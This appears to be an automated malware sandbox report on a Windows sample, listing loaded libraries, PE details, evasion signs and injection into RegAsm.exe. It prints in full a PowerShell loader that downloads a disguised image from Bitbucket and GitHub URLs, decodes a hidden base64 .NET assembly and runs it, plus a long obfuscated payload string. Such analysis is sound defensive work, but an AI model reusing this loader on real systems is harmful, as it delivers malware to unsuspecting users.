        Source: C:\Windows\System32\svchost.exe Section loaded: powrprof.dll
        Source: C:\Windows\System32\svchost.exe Section loaded: xmllite.dll
        Source: C:\Windows\System32\svchost.exe Section loaded: firewallapi.dll
        Source: C:\Windows\System32\svchost.exe Section loaded: esent.dll
        Source: C:\Windows\System32\svchost.exe Section loaded: umpdc.dll
        Source: C:\Windows\System32\svchost.exe Section loaded: dnsapi.dll
        Source: C:\Windows\System32\svchost.exe Section loaded: iphlpapi.dll
        Source: C:\Windows\System32\svchost.exe Section loaded: fwbase.dll
        Source: C:\Windows\System32\svchost.exe Section loaded: wldp.dll
        Source: C:\Windows\System32\svchost.exe Section loaded: ntmarta.dll
        Source: C:\Windows\System32\svchost.exe Section loaded: profapi.dll
        Source: C:\Windows\System32\svchost.exe Section loaded: flightsettings.dll
        Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
        Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
        Source: C:\Windows\System32\svchost.exe Section loaded: netprofm.dll
        Source: C:\Windows\System32\svchost.exe Section loaded: npmproxy.dll
        Source: C:\Windows\System32\svchost.exe Section loaded: bitsigd.dll
        Source: C:\Windows\System32\svchost.exe Section loaded: upnp.dll
        Source: C:\Windows\System32\svchost.exe Section loaded: winhttp.dll
        Source: C:\Windows\System32\svchost.exe Section loaded: ssdpapi.dll
        Source: C:\Windows\System32\svchost.exe Section loaded: urlmon.dll
        Source: C:\Windows\System32\svchost.exe Section loaded: iertutil.dll
        Source: C:\Windows\System32\svchost.exe Section loaded: srvcli.dll
        Source: C:\Windows\System32\svchost.exe Section loaded: netutils.dll
        Source: C:\Windows\System32\svchost.exe Section loaded: appxdeploymentclient.dll
        Source: C:\Windows\System32\svchost.exe Section loaded: cryptbase.dll
        Source: C:\Windows\System32\svchost.exe Section loaded: wsmauto.dll
        Source: C:\Windows\System32\svchost.exe Section loaded: miutils.dll
        Source: C:\Windows\System32\svchost.exe Section loaded: wsmsvc.dll
        Source: C:\Windows\System32\svchost.exe Section loaded: dsrole.dll
        Source: C:\Windows\System32\svchost.exe Section loaded: pcwum.dll
        Source: C:\Windows\System32\svchost.exe Section loaded: mi.dll
        Source: C:\Windows\System32\svchost.exe Section loaded: userenv.dll
        Source: C:\Windows\System32\svchost.exe Section loaded: gpapi.dll
        Source: C:\Windows\System32\svchost.exe Section loaded: wkscli.dll
        Source: C:\Windows\System32\svchost.exe Section loaded: sspicli.dll
        Source: C:\Windows\System32\svchost.exe Section loaded: ondemandconnroutehelper.dll
        Source: C:\Windows\System32\svchost.exe Section loaded: msv1_0.dll
        Source: C:\Windows\System32\svchost.exe Section loaded: ntlmshared.dll
        Source: C:\Windows\System32\svchost.exe Section loaded: cryptdll.dll
        Source: C:\Windows\System32\svchost.exe Section loaded: webio.dll
        Source: C:\Windows\System32\svchost.exe Section loaded: mswsock.dll
        Source: C:\Windows\System32\svchost.exe Section loaded: winnsi.dll
        Source: C:\Windows\System32\svchost.exe Section loaded: fwpuclnt.dll
        Source: C:\Windows\System32\svchost.exe Section loaded: rasadhlp.dll
        Source: C:\Windows\System32\svchost.exe Section loaded: rmclient.dll
        Source: C:\Windows\System32\svchost.exe Section loaded: usermgrcli.dll
        Source: C:\Windows\System32\svchost.exe Section loaded: execmodelclient.dll
        Source: C:\Windows\System32\svchost.exe Section loaded: propsys.dll
        Source: C:\Windows\System32\svchost.exe Section loaded: coremessaging.dll
        Source: C:\Windows\System32\svchost.exe Section loaded: twinapi.appcore.dll
        Source: C:\Windows\System32\svchost.exe Section loaded: onecorecommonproxystub.dll
        Source: C:\Windows\System32\svchost.exe Section loaded: execmodelproxy.dll
        Source: C:\Windows\System32\svchost.exe Section loaded: resourcepolicyclient.dll
        Source: C:\Windows\System32\svchost.exe Section loaded: vssapi.dll
        Source: C:\Windows\System32\svchost.exe Section loaded: vsstrace.dll
        Source: C:\Windows\System32\svchost.exe Section loaded: samcli.dll
        Source: C:\Windows\System32\svchost.exe Section loaded: samlib.dll
        Source: C:\Windows\System32\svchost.exe Section loaded: es.dll
        Source: C:\Windows\System32\svchost.exe Section loaded: bitsproxy.dll
        Source: C:\Windows\System32\svchost.exe Section loaded: dhcpcsvc6.dll
        Source: C:\Windows\System32\svchost.exe Section loaded: dhcpcsvc.dll
        Source: C:\Windows\System32\svchost.exe Section loaded: schannel.dll
        Source: C:\Windows\System32\svchost.exe Section loaded: mskeyprotect.dll
        Source: C:\Windows\System32\svchost.exe Section loaded: ntasn1.dll
        Source: C:\Windows\System32\svchost.exe Section loaded: ncrypt.dll
        Source: C:\Windows\System32\svchost.exe Section loaded: ncryptsslp.dll
        Source: C:\Windows\System32\svchost.exe Section loaded: msasn1.dll
        Source: C:\Windows\System32\svchost.exe Section loaded: cryptsp.dll
        Source: C:\Windows\System32\svchost.exe Section loaded: rsaenh.dll
        Source: C:\Windows\System32\svchost.exe Section loaded: dpapi.dll
        Source: C:\Windows\System32\svchost.exe Section loaded: mpr.dll
        Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32
        Source: Window Recorder Window detected: More than 3 window changes detected
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
        Source: OTO2wVGgkl.exe Static PE information: Image base 0x140000000 > 0x60000000
        Source: OTO2wVGgkl.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
        Source: OTO2wVGgkl.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
        Source: OTO2wVGgkl.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
        Source: OTO2wVGgkl.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
        Source: OTO2wVGgkl.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
        Source: OTO2wVGgkl.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
        Source: OTO2wVGgkl.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
        Source: Binary string: wextract.pdb source: OTO2wVGgkl.exe
        Source: Binary string: wextract.pdbGCTL source: OTO2wVGgkl.exe
        Source: OTO2wVGgkl.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
        Source: OTO2wVGgkl.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
        Source: OTO2wVGgkl.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
        Source: OTO2wVGgkl.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
        Source: OTO2wVGgkl.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

        Data Obfuscation

        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: $codigo = '[obfuscated payload string removed]'
        Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$codigo = '[obfuscated payload string removed]'
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/gdffffffff/ddddd/downloads/img_test.jpg?11811735', 'https://raw.githubusercontent.com/santomalo/audit/main/img_test.jpg?14441723'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('testpowershell.Home'); $method = $type.GetMethod('la').Invoke($null, [object[]] ('txt.60op/sdaolnwod/wqtretre/kruremlur/gro.tekcubtib//:sptth', '0', 'StartupName', 'RegAsm', '0'))}}" .exe -windowstyle hidden -exec
        Source: OTO2wVGgkl.exe Static PE information: 0xAE1BC4F8 [Tue Jul 25 12:18:00 2062 UTC]
        Source: C:\Users\user\Desktop\OTO2wVGgkl.exe Code function: 0_2_00007FF6975A1D28 memset,memset,RegCreateKeyExA,RegQueryValueExA,RegCloseKey,GetSystemDirectoryA,LoadLibraryA,GetProcAddress,FreeLibrary,GetSystemDirectoryA,LocalAlloc,GetModuleFileNameA,RegCloseKey,RegSetValueExA,RegCloseKey,LocalFree,0_2_00007FF6975A1D28
        Source: C:\Users\user\Desktop\OTO2wVGgkl.exe Code function: 0_2_00007FF6975A1684 CompareStringA,GetFileAttributesA,LocalAlloc,GetPrivateProfileIntA,GetPrivateProfileStringA,GetShortPathNameA,CompareStringA,LocalAlloc,LocalAlloc,GetFileAttributesA,0_2_00007FF6975A1684
        Source: C:\Users\user\Desktop\OTO2wVGgkl.exe Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce wextract_cleanup0

        Hooking and other Techniques for Hiding and Protection

        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
        Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Memory allocated: 2880000 memory reserve | memory write watch
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Memory allocated: 2A30000 memory reserve | memory write watch
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Memory allocated: 4A30000 memory reserve | memory write watch
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Thread delayed: delay time: 922337203685477
        Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1424
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1398
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4595
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5181
        Source: C:\Users\user\Desktop\OTO2wVGgkl.exe Check user administrative privileges: GetTokenInformation, graph_0-2345
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3412 Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3192 Thread sleep count: 4595 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3192 Thread sleep count: 5181 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5836 Thread sleep time: -14757395258967632s >= -30000s
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 1864 Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Windows\System32\svchost.exe TID: 6544 Thread sleep time: -30000s >= -30000s
        Source: C:\Windows\System32\svchost.exe File opened: PhysicalDrive0
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
        Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
        Source: C:\Users\user\Desktop\OTO2wVGgkl.exe Code function: 0_2_00007FF6975A204C FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA, 0_2_00007FF6975A204C
        Source: C:\Users\user\Desktop\OTO2wVGgkl.exe Code function: 0_2_00007FF6975A64E4 GetSystemInfo,CreateDirectoryA,RemoveDirectoryA, 0_2_00007FF6975A64E4
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: powershell.exe, 00000008.00000002.2340710949.000001943F2B8000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: tEventVmNetworkAdapter',
        Source: powershell.exe, 00000008.00000002.2340710949.000001943F2B8000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 'Remove-NetEventVmNetworkAdapter',
        Source: powershell.exe, 00000008.00000002.2340710949.000001943DEED000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: QEMU Virtual CPU
        Source: powershell.exe, 00000008.00000002.2340710949.000001943F2B8000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 'MSFT_NetEventVmNetworkAdatper.cdxml',
        Source: powershell.exe, 00000008.00000002.2340710949.000001943F2B8000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Get-NetEventVmNetworkAdapterX
        Source: powershell.exe, 00000008.00000002.2340710949.000001943E12B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Remove-NetEventVmNetworkAdapter
        Source: powershell.exe, 00000008.00000002.2340710949.000001943E12B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Add-NetEventVmNetworkAdapter
        Source: powershell.exe, 00000008.00000002.2340710949.000001943F2B8000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Remove-NetEventVmNetworkAdapterX
        Source: powershell.exe, 00000008.00000002.2340710949.000001943F2B8000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: +MSFT_NetEventVmNetworkAdatper.format.ps1xmlX
        Source: powershell.exe, 00000008.00000002.2340710949.000001943F2B8000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Add-NetEventVmNetworkAdapterX
        Source: svchost.exe, 0000000A.00000002.3436789270.0000025084858000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000A.00000002.3437375112.00000250FF22B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
        Source: powershell.exe, 00000008.00000002.2340710949.000001943F2B8000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: #MSFT_NetEventVmNetworkAdatper.cdxmlX
        Source: powershell.exe, 00000008.00000002.2340710949.000001943F2B8000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 'Add-NetEventVmNetworkAdapter',
        Source: powershell.exe, 00000008.00000002.2340710949.000001943F2B8000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 'Get-NetEventVmNetworkAdapter',
        Source: powershell.exe, 00000008.00000002.2340710949.000001943E12B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Get-NetEventVmNetworkAdapter
        Source: powershell.exe, 00000008.00000002.2340710949.000001943F2B8000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 'MSFT_NetEventVmNetworkAdatper.format.ps1xml',
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
        Source: C:\Users\user\Desktop\OTO2wVGgkl.exe Code function: 0_2_00007FF6975A1D28 memset,memset,RegCreateKeyExA,RegQueryValueExA,RegCloseKey,GetSystemDirectoryA,LoadLibraryA,GetProcAddress,FreeLibrary,GetSystemDirectoryA,LocalAlloc,GetModuleFileNameA,RegCloseKey,RegSetValueExA,RegCloseKey,LocalFree,0_2_00007FF6975A1D28
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
        Source: C:\Users\user\Desktop\OTO2wVGgkl.exe Code function: 0_2_00007FF6975A8790 SetUnhandledExceptionFilter,0_2_00007FF6975A8790
        Source: C:\Users\user\Desktop\OTO2wVGgkl.exe Code function: 0_2_00007FF6975A8494 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00007FF6975A8494
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Memory allocated: page read and write | page guard

        HIPS / PFW / Operating System Protection Evasion

        Source: Yara match File source: amsi64_5664.amsi.csv, type: OTHER
        Source: Yara match File source: Process Memory Space: powershell.exe PID: 1776, type: MEMORYSTR
        Source: Yara match File source: Process Memory Space: powershell.exe PID: 5664, type: MEMORYSTR
        Source: 8.2.powershell.exe.1944a15c978.1.raw.unpack, Program.cs Reference to suspicious API methods: Conversions.ToGenericParameter<CreateApi>((object)Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryA(ref name), ref method), typeof(CreateApi)))
        Source: 8.2.powershell.exe.1944a15c978.1.raw.unpack, Program.cs Reference to suspicious API methods: ReadProcessMemory(processInformation.ProcessHandle, num4 + 8, ref buffer, 4, ref bytesRead)
        Source: 8.2.powershell.exe.1944a15c978.1.raw.unpack, Program.cs Reference to suspicious API methods: VirtualAllocEx(processInformation.ProcessHandle, num3, length, 12288, 64)
        Source: 8.2.powershell.exe.1944a15c978.1.raw.unpack, Program.cs Reference to suspicious API methods: WriteProcessMemory(processInformation.ProcessHandle, num5, payload, bufferSize, ref bytesRead)
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 402000
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 442000
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 472000
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 8E4008
        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IXP000.TMP\123.vbs"
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$codigo = 'WwBO#GU#d##u#FM#ZQBy#HY#aQBj#GU#U#Bv#Gk#bgB0#E0#YQBu#GE#ZwBl#HI#XQ#6#Do#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b##g#D0#I#Bb#E4#ZQB0#C4#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b#BU#Hk#c#Bl#F0#Og#6#FQ#b#Bz#DE#Mg#N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgB1#G4#YwB0#Gk#bwBu#C##R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#RgBy#G8#bQBM#Gk#bgBr#HM#I#B7#C##c#Bh#HI#YQBt#C##K#Bb#HM#d#By#Gk#bgBn#Fs#XQBd#CQ#b#Bp#G4#awBz#Ck#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#B3#GU#YgBD#Gw#aQBl#G4#d##g#D0#I#BO#GU#dw#t#E8#YgBq#GU#YwB0#C##UwB5#HM#d#Bl#G0#LgBO#GU#d##u#Fc#ZQBi#EM#b#Bp#GU#bgB0#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#C##PQ#g#Ec#ZQB0#C0#UgBh#G4#Z#Bv#G0#I##t#Ek#bgBw#HU#d#BP#GI#agBl#GM#d##g#CQ#b#Bp#G4#awBz#C##LQBD#G8#dQBu#HQ#I##k#Gw#aQBu#Gs#cw#u#Ew#ZQBu#Gc#d#Bo#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgBv#HI#ZQBh#GM#a##g#Cg#J#Bs#Gk#bgBr#C##aQBu#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#Ck#I#B7#C##d#By#Hk#I#B7#C##cgBl#HQ#dQBy#G4#I##k#Hc#ZQBi#EM#b#Bp#GU#bgB0#C4#R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#K##k#Gw#aQBu#Gs#KQ#g#H0#I#Bj#GE#d#Bj#Gg#I#B7#C##YwBv#G4#d#Bp#G4#dQBl#C##fQ#g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I#By#GU#d#B1#HI#bg#g#CQ#bgB1#Gw#b##g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#Gw#aQBu#Gs#cw#g#D0#I#B##Cg#JwBo#HQ#d#Bw#HM#Og#v#C8#YgBp#HQ#YgB1#GM#awBl#HQ#LgBv#HI#Zw#v#Gc#Z#Bm#GY#ZgBm#GY#ZgBm#GY#LwBk#GQ#Z#Bk#GQ#LwBk#G8#dwBu#Gw#bwBh#GQ#cw#v#Gk#bQBn#F8#d#Bl#HM#d##u#Go#c#Bn#D8#MQ#x#Dg#MQ#x#Dc#Mw#1#Cc#L##g#Cc#a#B0#HQ#c#Bz#Do#Lw#v#HI#YQB3#C4#ZwBp#HQ#a#B1#GI#dQBz#GU#cgBj#G8#bgB0#GU#bgB0#C4#YwBv#G0#LwBz#GE#bgB0#G8#bQBh#Gw#bw#v#GE#dQBk#Gk#d##v#G0#YQBp#G4#LwBp#G0#ZwBf#HQ#ZQBz#HQ#LgBq#H##Zw#/#DE#N##0#DQ#MQ#3#DI#Mw#n#Ck#Ow#N##o#I##g#C##I##g#C##I##g#C##I##g#C##I##k#Gk#bQBh#Gc#ZQBC#Hk#d#Bl#HM#I##9#C##R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#RgBy#G8#bQBM#Gk#bgBr#HM#I##k#Gw#aQBu#G
s#cw#7##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##g#Gk#Zg#g#Cg#J#Bp#G0#YQBn#GU#QgB5#HQ#ZQBz#C##LQBu#GU#I##k#G4#dQBs#Gw#KQ#g#Hs#I##k#Gk#bQBh#Gc#ZQBU#GU#e#B0#C##PQ#g#Fs#UwB5#HM#d#Bl#G0#LgBU#GU#e#B0#C4#RQBu#GM#bwBk#Gk#bgBn#F0#Og#6#FU#V#BG#Dg#LgBH#GU#d#BT#HQ#cgBp#G4#Zw#o#CQ#aQBt#GE#ZwBl#EI#eQB0#GU#cw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##J#Bz#HQ#YQBy#HQ#RgBs#GE#Zw#g#D0#I##n#Dw#P#BC#EE#UwBF#DY#N#Bf#FM#V#BB#FI#V##+#D4#Jw#7#C##J#Bl#G4#Z#BG#Gw#YQBn#C##PQ#g#Cc#P##8#EI#QQBT#EU#Ng#0#F8#RQBO#EQ#Pg#+#Cc#Ow#g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##g#D0#I##k#Gk#bQBh#Gc#ZQBU#GU#e#B0#C4#SQBu#GQ#ZQB4#E8#Zg#o#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#KQ#7#C##DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#CQ#ZQBu#GQ#SQBu#GQ#ZQB4#C##PQ#g#CQ#aQBt#GE#ZwBl#FQ#ZQB4#HQ#LgBJ#G4#Z#Bl#Hg#TwBm#Cg#J#Bl#G4#Z#BG#Gw#YQBn#Ck#Ow#N##o#I##g#C##I##g#C##I##g#C##I##g#C##I#Bp#GY#I##o#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##g#C0#ZwBl#C##M##g#C0#YQBu#GQ#I##k#GU#bgBk#Ek#bgBk#GU#e##g#C0#ZwB0#C##J#Bz#HQ#YQBy#HQ#SQBu#GQ#ZQB4#Ck#I#B7#C##J#Bz#HQ#YQBy#HQ#SQBu#GQ#ZQB4#C##Kw#9#C##J#Bz#HQ#YQBy#HQ#RgBs#GE#Zw#u#Ew#ZQBu#Gc#d#Bo#Ds#I##N##o#I##g#CJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/gdffffffff/ddddd/downloads/img_test.jpg?11811735', 'https://raw.githubusercontent.com/santomalo/audit/main/img_test.jpg?14441723'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = 